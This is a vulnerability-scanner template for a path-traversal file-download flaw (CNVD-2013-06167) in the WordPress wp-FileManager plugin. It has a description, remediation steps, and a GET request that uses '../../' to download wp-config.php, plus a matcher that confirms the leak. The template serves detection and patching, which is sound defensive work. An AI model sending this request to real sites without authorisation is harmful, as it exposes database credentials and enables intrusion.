id: CNVD-2013-06167
info:
  name: WordPress Plugin wp-FileManager_1.0_Any file download
  author:
  - l0ne1y
  description: |-
    WordPress Plugin wp-FileManager 'path' parameter arbitrary file download vulnerability

    WordPress is a blog platform developed by the WordPress Software Foundation using the PHP language. The platform supports the establishment of personal blog websites on PHP and MySQL servers. The FileManager for WordPress plugin can change, delete, organize, and upload files.

    There is a security vulnerability in the WordPress wp-FileManager plugin. Allows an attacker to download arbitrary files on the site.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://wordpress.org/extend/plugins/wp-filemanager/

    Temporary fix:
    1. Filter \".\" so that users cannot go back to the upper directory in the URL.
    2. Regular matching strictly determines the format of user input parameters, hard-codes or uniformly encodes the file name parameters passed by the user, performs whitelist control on file types, and rejects parameters containing malicious characters or null characters.
    3. Prohibit the system from providing directory traversal services, such as: php.ini configures open_basedir to limit file access scope.
    4. Save the file path to the database and let the user submit the file corresponding to the ID to download the file.
    5. Verify permissions before users download files.
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"<?php") && contains(body,"wp-config")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download'
  method: GET
